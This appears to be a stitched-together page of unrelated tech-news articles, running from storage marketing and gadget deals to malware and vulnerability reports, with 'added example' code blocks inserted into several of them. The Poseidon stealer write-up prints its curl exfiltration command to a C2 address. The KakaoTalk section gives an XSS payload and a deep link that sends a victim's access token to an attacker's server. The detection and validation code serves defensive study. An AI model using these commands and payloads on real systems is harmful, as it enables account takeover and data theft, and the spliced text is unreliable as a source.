Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows


Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.

Infinidat’s InfiniSafe® Automated Cyber Protection (ACP) is a first-of-its-kind cybersecurity integration solution that is designed to reduce the threat window of cyberattacks, such as ransomware.

Sophisticated cyberattacks, including new sinister forms of AI-driven attacks, are increasingly targeting the data storage infrastructure of enterprises.

Infinidat’s InfiniSafe ACP enables enterprises to easily integrate with their Security Operations Centers (SOC), Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR) cybersecurity software applications, and simple syslog functions for less complex environments.

A security-related incident or event triggers immediate automated immutable snapshots of data, providing the ability to protect InfiniBox® and InfiniBox™ SSA block-based volumes and/or file systems and ensure near instantaneous cyber recovery.

“The merging of cybersecurity and data infrastructure has been compelling CIOs, CISOs and IT team leaders to rethink how to secure enterprise storage across hybrid multi-cloud deployments in light of increasing cyberattacks.

Enterprises need proactive strategies, seamless integration across IT domains, and the most advanced, automated technologies to stay ahead of cyber threats,” said Eric Herzog, CMO at Infinidat. Recognized as a cyber secure storage expert, Herzog is coming off participation in a string of cybersecurity panel discussions, roundtables and conference events.

“Infinidat has carved out a very unique leadership position as the only storage vendor to offer an automated enterprise storage cyber protection solution that seamlessly integrates with cyber security software applications,” said Chris Evans, Principal Analyst at Architecting IT.

“Infinidat’s newly launched InfiniSafe Automated Cyber Protection that easily meshes with the SIEM, SOAR or Security Operations Centers is exactly what enterprises need to include enterprise storage as a comprehensive approach to combat cyber threats.”

Infinidat’s new InfiniSafe ACP capability orchestrates the automatic taking of immutable snapshots of data, at the speed of compute, to stay ahead of cyberattacks by decisively cutting off the proliferation of data corruption.

Evans added, “This proactive cyber protection technique is extremely valuable, as it enables taking immediate immutable snapshots of data at the first sign of a potential cyberattack. This provides a significant advancement to ensure enterprise cyber storage resilience and recovery are integral to an enterprise’s cybersecurity strategy.

ACP enhances an enterprise’s overall cyber resilience by reducing the threat window and minimizing the impact of cyberattacks on enterprise storage environments.”

The InfiniSafe Automated Cyber Protection is one of the biggest innovations of the year in cybersecurity because it unlocks the full potential of an enterprise’s security posture and maximizes the investments that an enterprise has made in protecting the business.

By plugging into existing security mechanisms and continuous monitoring, InfiniSafe ACP bridges the gaps between enterprise storage and cybersecurity strategies that can transform the way CIOs and CISOs think about enterprise data infrastructures.

Information technology leaders have identified this ability to automate data snapshot commands and data pathways as critical to early detection and worry-free cyber recovery that minimizes the effects of even the most vicious and deceptive cyberattacks of malicious actors.

An enterprise’s security team can put all its information from security operations through an enterprise storage intelligence grid to create the most sensitive triggers that often get missed by existing technologies and techniques.

Paul Rapier, VP of Information Technology at the Detroit Pistons, stated, “Infinidat’s efforts in enhancing cyber resilience for enterprises, particularly through the new InfiniSafe Automated Cyber Protection, are noteworthy for data security.”

Allen Shahdadi, Vice President of Global Sales at Sycomp, said, “Infinidat has become synonymous with guaranteed cyber resilient storage.

Infinidat continues to deliver powerful solutions that solve critical cyber issues for enterprises and service providers around the globe. The InfiniSafe Automated Cyber Protection solution brings much needed capabilities to fight more effectively against cyberattacks.

The automatic capture of immutable snapshots of primary data could be the difference between your data being held ransom and the rapid recovery of your data. Before international cybercriminals, hackers and fraudsters can gain an advantage, Infinidat’s InfiniSafe reduces the threat window decisively.”

The InfiniSafe Automated Cyber Protection solution is the latest in a string of cybersecurity capabilities that Infinidat has brought forward to strengthen enterprise storage in the face of constant threats of a tsunami of cyberattacks.

Infinidat has also unveiled the following extensions of its state-of-the-art cyber resilient capabilities:

  • InfiniSafe Cyber Detection for VMware – Access to InfiniSafe cyber resilience capabilities to combat cyberattacks has been expanded into VMware environments. This cyber detection capability uses AI and machine learning to determine, with highly granular insights, whether a VMware datastore and the VMs it contains have been compromised, so the impact of a cyberattack can be readily assessed.
  • InfiniSafe Cyber Detection for InfiniGuard® – Cyber detection will be extended onto the InfiniGuard purpose-built backup appliance to help enterprises resist and quickly recover from cyberattacks. This proven capability provides highly intelligent scanning and indexing to identify signs of cyber threats in backup environments, helping ensure that data has integrity. The enhanced version will be available in 2H 2024.

As a leader in cyber resilient storage, Infinidat first unveiled its InfiniSafe software-based platform two years ago with a set of cybersecurity functions. This solution has won numerous awards and has been proven by large global enterprises.

The comprehensive cyber resilience capabilities of InfiniSafe technology improve the ability of an enterprise to combat and protect against ever-increasing cyberattacks and data breaches by uniquely combining immutable snapshots, logical air gapping, fenced/isolated networks, and virtually instantaneous data recovery into a single, high-performance platform.

The InfiniSafe ACP is the latest example of Infinidat’s broadening innovation. It was introduced alongside the launch of the InfiniBox G4 family of next-generation storage arrays for all-flash and hybrid configurations.

The G4 series is a completely new storage array family built from the ground up that substantially extends Infinidat’s cyber storage resilience and delivers up to 2.5x improvement in performance.

The InfiniBox G4 series introduces a new set of foundational elements, powered by InfuzeOS, which is Infinidat’s software defined storage operating system.

Webinar On Demand

To watch Infinidat’s end-user webinar about the new solutions − “The Future of Enterprise Storage, Cyber Security and Hybrid Multi-Cloud” – users can click here.

About Infinidat

Infinidat provides enterprises and service providers with a platform-native primary and secondary storage architecture that delivers comprehensive data services based on InfiniVerse®. This unique platform delivers outstanding IT operating benefits, support for modern workloads across on-premises and hybrid multi-cloud environments. Infinidat’s cyber resilient-by-design infrastructure, consumption-based performance, 100% availability, and cyber security guaranteed SLAs align with enterprise IT and business priorities. Infinidat’s award-winning platform-native data services and acclaimed white glove service are continuously recommended by customers, as recognized by Gartner® Peer Insights reviews. For more information: www.infinidat.com.


Contact

Director of Global Communications
Sapna Capoor
Infinidat
[email protected]
+44 (0) 7789684159



‘Poseidon’ Mac stealer distributed via Google ads


On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by the handle Rodrigo4 on the XSS underground forum has been working on a stealer with features and a code base similar to the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with a custom name, icon and AppleScript. The stealer offers functionality reminiscent of Atomic Stealer, including a file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code, also seen by other researchers, for the recently advertised capability of stealing VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

Conclusion

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this ‘Poseidon’ campaign as OSX.RodStealer, and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain

arcthost[.]org

Decoy site

arc-download[.]com

Download URL

zestyahhdog[.]com/Arc12645413[.]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192[.]4/p2p
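The exfiltration command shown earlier and the indicator list above give a defender two things to match on: the published indicators themselves (once the defanged `[.]` notation is reversed) and the shape of the curl call, a POST with `--data-binary` and the custom uuid/user/buildid headers. The script below is an added example and is not part of the Malwarebytes post; it runs both checks over a few constructed log lines. The log format, client addresses, user name and file paths are invented for the example, while the domains, IP address, hash and header names are exactly the ones published above.

```python
"""Match the published Poseidon/RodStealer indicators and the exfiltration
pattern against log lines. Added example with constructed sample data."""
import re

# Indicators exactly as published in the post (defanged with "[.]").
IOCS_DEFANGED = {
    "domain": ["arcthost[.]org", "arc-download[.]com", "zestyahhdog[.]com"],
    "ipv4": ["79.137.192[.]4"],
    "sha256": ["c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05"],
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the form that appears in logs."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")


IOCS = {kind: {refang(v).lower() for v in values}
        for kind, values in IOCS_DEFANGED.items()}

# Token extractors; matches are compared to the IoC sets exactly, never as
# substrings, so "notarc-download.com" would not trigger.
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b")
# Header names passed with curl -H; quotes may be backslash-escaped in a
# captured command line.
CURL_HEADER_RE = re.compile(r'-H\s+\\*"?([a-z0-9_-]+):', re.I)
EXFIL_HEADERS = {"uuid", "user", "buildid"}  # custom headers in the stealer's curl call


def find_ioc_hits(line: str) -> list:
    """Return (kind, value) pairs for every published indicator on the line."""
    lower = line.lower()
    hits = []
    for kind, regex in (("domain", HOST_RE), ("ipv4", IPV4_RE), ("sha256", SHA256_RE)):
        for value in set(regex.findall(lower)):
            if value in IOCS[kind]:
                hits.append((kind, value))
    return hits


def looks_like_poseidon_exfil(line: str) -> bool:
    """Behavioural check: curl POSTing a file body with at least two of the
    stealer's custom headers, independent of the C2 address."""
    lower = line.lower()
    if "curl" not in lower or "--data-binary @" not in lower:
        return False
    headers = set(CURL_HEADER_RE.findall(lower))
    return len(headers & EXFIL_HEADERS) >= 2


def scan(lines: list) -> list:
    """Scan log lines; each finding records the 1-based line number."""
    findings = []
    for n, line in enumerate(lines, 1):
        for kind, value in find_ioc_hits(line):
            findings.append({"line": n, "kind": kind, "value": value})
        if looks_like_poseidon_exfil(line):
            findings.append({"line": n, "kind": "exfil-pattern",
                             "value": "curl POST with uuid/user/buildid headers"})
    return findings


# Constructed sample lines (DNS, proxy, process-execution and file-hash events).
SAMPLE_LOGS = [
    "2024-06-24T10:01:02Z dns client=10.0.0.5 query=arc-download.com",
    "2024-06-24T10:01:09Z proxy client=10.0.0.5 GET http://zestyahhdog.com/Arc12645413.dmg",
    '2024-06-24T10:02:30Z exec user=alice cmd="curl -X POST -H \\"uuid: 399122bdb9844f7d934631745e22bd06\\" '
    '-H \\"user: H1N1_Group\\" -H \\"buildid: id777\\" --data-binary @/tmp/out.zip http://79.137.192.4/p2p"',
    "2024-06-24T10:02:31Z filehash path=/Users/alice/Downloads/Arc12645413.dmg "
    "sha256=c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05",
    "2024-06-24T10:03:00Z proxy client=10.0.0.6 GET https://www.example.org/",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The behavioural check matters because the C2 address and download domain are the cheapest things for the operator to rotate; the header names are baked into the builder and survive longer.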


Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!


The Ring Video Doorbell seamlessly integrates with Amazon’s Alexa ecosystem, providing a comprehensive and convenient solution for monitoring your home’s entrance. With crystal-clear 1080p HD video and two-way audio communication, you can easily see and speak to visitors from anywhere using compatible devices like your Fire TV, Fire Tablet, or Echo Show. Alexa can even notify you when someone is at the door or when a package is delivered, enhancing your awareness and control.

With Ring Protect, you can store and share recorded videos and photos for as little as $3.99 per month per device or $10 for unlimited devices. This subscription enhances security by capturing and retaining valuable footage for future reference, ensuring you never miss a moment.

The Ring Video Doorbell’s battery life typically lasts around a month on a single charge, depending on factors like foot traffic and settings. However, its innovative Quick Release Battery feature makes swapping batteries effortless, minimizing downtime and maintaining continuous surveillance.

In addition to its impressive features and seamless integration, the Ring Video Doorbell offers the added benefit of deterring potential porch pirates. Allowing you to communicate with visitors remotely and record their every move creates a powerful deterrent against theft and enhances the overall security of your home.



Fitbit users can now add American Express cards to Google Wallet



Fitbit users can now finally add American Express cards to their Google Wallet. This means that those who use Fitbit devices can now utilize their American Express cards for payments through Google Wallet. This feature has been long-awaited since Google replaced Fitbit Pay with Google Wallet, and it has now finally been rolled out as part of the Google Play Services v24.25 update. Previously, Google had mentioned the addition of American Express card support in an earlier update, but later retracted it. However, the feature has been reintroduced in the latest update, and users have reported successfully adding their American Express cards to their Fitbit devices. The official changelog for the update also confirms the addition of this feature.

In addition to American Express card support, the Google Play Services v24.25 update brings several other changes for Google Wallet users. These changes include:

  • The ability to add an e-wallet as a payment method or use linked e-wallets in Google Pay to complete payments on your phone.
  • New features for IDs added to Wallet on your phone.
  • The option to use Pixel as a payment method in Wallet on your phone.

The rollout of American Express card support for Fitbit devices is a significant development for users who have been eagerly awaiting this feature. It provides greater flexibility and convenience for those who prefer to use their American Express cards for payments. The additional changes included in the update further enhance the functionality of Google Wallet, making it a more versatile and comprehensive payment solution.

While Google has not officially confirmed the completion of the rollout, the reports of successful additions and the mention in the official changelog suggest that the feature is now widely available. This update is a welcome addition for Fitbit owners, who can now enjoy the convenience of using their American Express cards for payments on their devices.



PoC Exploit Released for Fortra FileCatalyst SQL Injection Vulnerability


A Proof-of-Concept (PoC) exploit has been released for a critical SQL Injection vulnerability in Fortra FileCatalyst Workflow.

This vulnerability could potentially allow attackers to modify application data.

This vulnerability, CVE-2024-5276, affects all versions of Fortra FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

The SQL Injection vulnerability, discovered on June 18, 2024, is classified under CWE-20 and CWE-89.

It indicates improper input validation and improper neutralization of special elements used in an SQL command.

The vulnerability has a CVSS v3.1 score of 9.8, reflecting its critical nature (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

This attack exploits target software that constructs SQL statements based on user input.

An attacker can craft input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended.

This vulnerability results from the failure of the application to validate input appropriately.
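The two weaknesses cited for this bug, CWE-89 (the input becomes part of the SQL statement text) and CWE-20 (the input is not validated), are easiest to see side by side. The following is an added, generic illustration using Python's sqlite3 module and a constructed in-memory table; it is not FileCatalyst Workflow code and says nothing about that product's internals. The usernames, table layout and the allowlist pattern are assumptions made for the example.

```python
"""String-built SQL beside the parameterized and validated form.
Added illustration with a constructed in-memory database."""
import re
import sqlite3

# Assumed input policy: what a legitimate username may look like.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for an application database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "admin")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """CWE-89: the input is spliced into the statement text, so a quote
    character in the input ends the literal and whatever follows is parsed
    as SQL the developer never wrote."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized query: the statement text is fixed and the value is
    passed separately, so quote characters are just data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def is_valid_username(username: str) -> bool:
    """CWE-20 layer: reject input that cannot be a legitimate username."""
    return USERNAME_RE.fullmatch(username) is not None


def find_user_hardened(conn: sqlite3.Connection, username: str) -> list:
    """Both layers: validate the shape of the input, then parameterize."""
    if not is_valid_username(username):
        raise ValueError("invalid username")
    return find_user_safe(conn, username)


if __name__ == "__main__":
    db = make_db()
    # Textbook input: the quote closes the literal, the rest widens the WHERE clause.
    crafted = "x' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, crafted))  # every row comes back
    print("safe:      ", find_user_safe(db, crafted))        # no row has that name
```

Validation alone is not a fix for CWE-89 (a field that legitimately contains quotes cannot be allowlisted this way), which is why the hardened function keeps the parameterized query as the primary control and uses the allowlist only as a second layer.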

Potential Impacts

This vulnerability’s likely impacts include creating administrative users and deleting or modifying data in the application database.

However, data exfiltration via SQL injection is not possible with this vulnerability.


Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled; otherwise, an authenticated user is needed.

The vulnerability affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Users of these versions are strongly advised to update their systems to the latest version to mitigate the risk.

Fortra has yet to release an official patch, but users should monitor the vendor’s advisories for updates.

The release of the PoC exploit for this critical SQL Injection vulnerability underscores the importance of timely updates and robust security practices.

Organizations using FileCatalyst Workflow should act swiftly to secure their systems against potential exploitation.




Huawei sees AI smartphones taking 90% of the market by 2030


AI is all over the place at the moment… as far as technology goes. It’s the current buzzword that is being used. Many smartphone OEMs have included plenty of AI features in their devices. The same goes for Huawei, who believes that AI smartphones will account for 90% of the market by 2030.

This was said by Huawei’s Executive Director and Chairman of the ICT Infrastructure Business Management Committee, Wang Tao. He said it during the keynote speech in Shanghai yesterday.

Huawei believes AI smartphones will take 90% of the market by 2030

He believes that AI-powered smartphones will account for 11% of shipments this year. That could reach the 90% level by 2030, though. He essentially sees the integration of LLMs and AI features becoming a standard for the industry.

Tao said the following: “We will soon see a huge boost to traffic from AI. At the same time, 5G-A networks will be able to provide higher speeds, lower latency, and greater capacity to meet the network demands of the AI era”.

Many smartphones already offer such features and are considered ‘AI smartphones’. Apple joined the fray with the company’s iOS 18 announcement recently. Well, users still don’t have access to all that, at least not in the stable form. Still, they’ll get access in a couple of months.

Companies will be able to run more and more AI tasks locally

When it comes to AI features, your phones need to talk to the server that runs larger LLMs. So for some processes, that is necessary. Companies are expected to be able to do more and more such tasks on smartphones, natively, though. LLMs will be getting more efficient, and processors more powerful and capable in the AI sense.

So, it seems like the AI buzzword is here to stay. Companies likely won’t stop using it, though they may reshape it. Apple, for example, avoided using ‘AI’, and simply calls its features ‘Apple Intelligence’.



Xeno RAT Attacking Users Via GitHub Repository And .gg Domains


Threat actors use RATs because they provide attackers with persistent access to compromised systems, enabling long-term espionage and exploitation.

North Korean hackers and other actors who target the gaming community are using free malware on GitHub called XenoRAT.

Hunt’s research team found it spreading through .gg domains and a GitHub repository that pretended to be Roblox scripting tools.

Xeno RAT Attacking Via GitHub

The ASEC division of AhnLab claimed it had evidence of a North Korea-related group employing Dropbox to send XenoRAT.


Besides this, one investigator discovered the software in an open directory that the Kimsuky threat group probably controls.

Threats like this one rely on crafty approaches, using numerous tricks to reach gamers and developers across platforms.

On XenoRAT’s GitHub page, you will find more advanced features such as HVNC, audio spying, and SOCKS5 reverse proxy.

Communication between clients and the controller is done through TCP sockets, and this follows an identifiable pattern that can be used to identify malicious activities.

The worrying point is that the malware is being distributed in .gg domains, which are popular within the esports community and target gamers. The network IDS rules for detection are available on the ET website.

It shows how threat actors increasingly use well-known platforms and communities to spread their tools.

The investigation started with SynapseX.revamped.V1.2.rar, an untrusted file that communicated with .gg sites, and led to a GitHub repository disguised as a Roblox scripting engine.

YouTube Account Associated with Xeno RAT & Quasar Distribution (Source – Hunt.io)

The repository contained several harmful executable files, such as XenoRAT and Quasar. Earlier, this GitHub user recognized one file as XWorm malware.

Further inquiries revealed that a YouTube channel called “P-Denny Gaming” was linked to it, which recommended that users turn off Windows Defender before installing that malware.

YouTube Video Instructing Users to Install Synapse X File (Source – Hunt.io)

The content of the channel, together with its comments, tried to make these malicious files appear genuine.

The XenoRAT and other malware are very dangerous to the gaming communities when distributed through .gg domains as well as on GitHub.

These threats exploit gamers’ trust in polished-looking tools and can result in the theft of personal data, game items, and financial details.

Using open-source platforms for malware distribution increases the chances of widespread infections.

Even if users are inclined to download or install software from sites they regard as trustworthy, they should be extremely careful.

Because these elaborate social engineering ploys mostly target the gaming community, a safe online gaming environment requires extra caution and healthy skepticism.




Xiaomi 15 Pro to deliver one negative & one positive change


Based on the latest information, the Xiaomi 15 Pro will deliver one negative and one positive change. This information comes from Digital Chat Station, by the way, one of the most reliable tipsters out there.

He shared some information about the device via Weibo, a Chinese social media network. He confirmed that the phone will be fueled by the Snapdragon 8 Gen 4 SoC. That much was a given.

The Xiaomi 15 Pro will deliver one negative & one positive change, amongst other things

In addition to that, the Xiaomi 15 Pro is said to include a 2K micro-curved display. An ultrasonic fingerprint scanner will also be included, which was not the case on the Xiaomi 14 Pro. That phone featured an optical in-display fingerprint scanner.

Now, in the title, we mentioned one negative and one positive change in specific. Well, here they are. The negative one has to do with the phone’s main camera. Xiaomi looks set to ditch the variable aperture, at least on this model. The phone will likely still be able to capture outstanding photos, but… having a variable aperture is useful.

Variable aperture has proven to be quite effective on smartphones, for shooting in various lighting situations, amongst other things. Well, the Xiaomi 15 Pro is said to offer a large aperture, but a fixed one.

The company will utilize a silicon-carbon battery

In regards to the positive change, Xiaomi looks set to adopt new battery tech. The phone will allegedly use a silicon-carbon negative electrode battery. Thanks mainly to that battery, the Xiaomi 15 Pro is said to include a larger battery, and yet weigh less than 200 grams. It is said to feature a 5,500mAh unit.

The Xiaomi 14 and Xiaomi 14 Pro launched back in October last year. They are expected to arrive around the same time this year, if not a bit sooner. The launch event will likely take place in China first yet again.

The Xiaomi 14 Pro didn’t even make it to global markets. The Xiaomi 14 and Xiaomi 14 Ultra did, but not the ‘Pro’ model. It remains to be seen if that will be the case this time around too.



Arkansas lawsuit labels Temu shopping app as ‘dangerous malware’


Arkansas has sued the makers of the e-commerce platform Temu over alleged deceptive trade practices. The state claims the shopping app is “dangerous malware” abusing system permissions to steal user data. The lawsuit also raises security concerns over the platform’s Chinese origin.

Temu is malware disguised as shopping app, Arkansas lawsuit claims

Launched in the US in 2022, Temu is an online shopping platform owned by PDD Holdings. Originally a Chinese company, PDD Holdings shifted its headquarters to Ireland last year. The firm also runs a separate shopping app called Pinduoduo in China, which security researchers previously labeled as potential spyware. In March 2023, Google briefly removed the latter from the Play Store after some of its “off-Play versions” were found to contain malware.

In his official complaint, Arkansas Attorney General Tim Griffin linked the two apps. Since Temu came several years after Pinduoduo and made its global debut in the US, Griffin believes it was modeled off its Chinese version and may have the same security lapses. “Temu purports to be an online shopping platform, but it is dangerous malware, surreptitiously granting itself access to virtually all data on a user’s cell phone,” the lawsuit begins.

It goes on to make sweeping claims accusing the app’s makers of purposefully designing it to override privacy settings and gain unrestricted access to unnecessary user data. Griffin says Temu sells user data to third parties to make money, violating the privacy rights of Arkansas citizens. The Arkansas AG also pointed to Apple’s now-resolved concerns about the shopping app’s compliance with data security transparency standards in the US and Europe.

Moreover, Griffin’s lawsuit cites findings by an independent research firm saying Temu can potentially hack users. The number of system permissions and the amount of data it can access is too high for a shopping app. It “sneaks” permissions to gain access to the user’s location, saved files, storage device, and more, which aren’t critical to its normal functioning. Temu also collects sensitive or personally identifiable information that it doesn’t need.

Temu’s Chinese ties are a security threat

Arkansas’ lawsuit against Temu goes beyond labeling it as “malware” and raises security concerns over the app’s Chinese ties. Griffin says Temu’s leadership team is “a cadre of former Chinese Communist Party officials.” As such, the platform is a significant security threat to US citizens. This lawsuit seeks an order enjoining the platform’s deceptive trade practices and privacy violations. It also seeks civil penalties and other monetary and equitable relief.

“Temu is not an online marketplace like Amazon or Walmart. It is a data-theft business that sells goods online as a means to an end,” Griffin said in an official statement. “Though it is known as an e-commerce platform, Temu is functionally malware and spyware. It is purposefully designed to gain unrestricted access to a user’s phone operating system. It can override data privacy settings on users’ devices, and it monetizes this unauthorized collection of data.”



1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution


KakaoTalk is an Android application installed and used by over 100 million people.

It is a widely popular application in South Korea that offers payments, ride-hailing services, shopping, email, etc. However, end-to-end encryption is not enabled by default on KakaoTalk; it is an opt-in feature named “Secure Chat”.

Further, this end-to-end encryption is not supported in group messaging or voice calling.

A critical vulnerability has been discovered in KakaoTalk that could allow an unauthorized remote threat actor to leak a victim’s access token via an HTTP request header.

In addition, this token can be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned CVE-2023-51219; its severity is yet to be categorized.


1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity WebView, which has multiple attack points as follows:

  • It can be started with a deep link (adb shell am start kakaotalk://buy)
  • JavaScript is enabled
  • It supports intent:// URLs, which can be used to send data to other non-exported app components via JavaScript
  • No sanitization
  • It leaks the Authorization HTTP header; this can be observed with a netcat listener in a terminal window after running adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, although the Authorization header can be leaked through a GET request, a small validation step prevents an attacker from loading arbitrary attacker-controlled URLs.

To overcome this, the researchers analyzed the code and found that the path, query and fragment of the URL are taken from the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk enforces a same-origin policy and does not load arbitrary URLs, the researchers checked whether any Kakao domains were vulnerable to DOM XSS.

One endpoint was identified that allowed redirection to any Kakao domain.

To leverage this same-site open redirect for malicious purposes, an XSS flaw was needed, and one was found.
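The redirect endpoint described above is the classic open-redirect shape: a returnUrl parameter whose host check is loose enough to accept any Kakao domain. The function below is an added, hypothetical example of how such a parameter is validated robustly; it is not KakaoTalk's code, and the allowlist entry and the sample URLs (attacker.example is a placeholder) are assumptions made for the illustration. It compares a naive substring check with an exact-host allowlist on the parsed hostname. One caveat the rest of the write-up makes clear: because the final payload lands on a host that is legitimately Kakao's, a host allowlist alone does not close this chain; the allowlisted pages must also be free of XSS.

```python
"""Exact-host allowlisting for a redirect parameter such as returnUrl.
Hypothetical added example; not KakaoTalk's code."""
from urllib.parse import urlsplit

# Exact hostnames a redirect may target. Suffix or substring matching is
# deliberately avoided. Hypothetical allowlist for this example.
ALLOWED_HOSTS = {"m.shoppinghow.kakao.com"}


def naive_contains_check(url: str) -> bool:
    """The kind of check that looks right and is not: any URL that merely
    mentions the trusted domain somewhere passes."""
    return "kakao.com" in url


def is_trusted_return_url(url: str) -> bool:
    """Accept only https URLs whose parsed hostname is on the allowlist."""
    # Backslashes and whitespace are treated differently by different URL
    # parsers (a WebView vs. server-side code); refuse them outright rather
    # than guess which parser wins.
    if any(ch in url for ch in "\\ \t\r\n"):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:            # e.g. a malformed IPv6 literal
        return False
    if parts.scheme != "https":   # rules out javascript:, intent:, http:
        return False
    if parts.username is not None or parts.password is not None:
        return False              # "trusted.host@attacker.host" style authorities
    host = parts.hostname         # urlsplit lower-cases this for us
    return host is not None and host in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed sample inputs; attacker.example is a placeholder domain.
    for candidate in (
        "https://m.shoppinghow.kakao.com/m/product/12345",
        "https://kakao.com.attacker.example/",
        "https://attacker.example/?next=m.shoppinghow.kakao.com",
        "https://m.shoppinghow.kakao.com@attacker.example/",
    ):
        print(f"{candidate}: naive={naive_contains_check(candidate)} "
              f"strict={is_trusted_return_url(candidate)}")
```

The check works on the hostname the parser actually produced, not on the raw string, which is what defeats the userinfo and look-alike-suffix cases; the explicit rejection of backslashes and whitespace guards against parser differentials that a single parser cannot detect on its own.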

This XSS flaw was found on the m.shoppinghow.kakao.com subdomain using a DOM Invader canary string; the subdomain already carried a stored XSS payload. The payload was as simple as “><img src=x onerror=alert(1);>.

Combining this XSS with the open redirect, the attackers created a malicious deep link: kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header, which was then sent to the attacker-controlled server; the attacker’s URL is base64-encoded in the payload:

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

This token can also be used to take over the victim’s Kakao Mail account that was used for registration.

Additionally, if the user does not have a Kakao Mail account, an attacker can still create a new Kakao Mail account and read the chat messages.

Furthermore, another notable point is that the new Kakao Mail account overwrites the user’s previously registered mail address without any additional checks.

The researchers have also detailed password reset via Burp and malicious deep link creation, and a proof-of-concept has been published on GitHub.


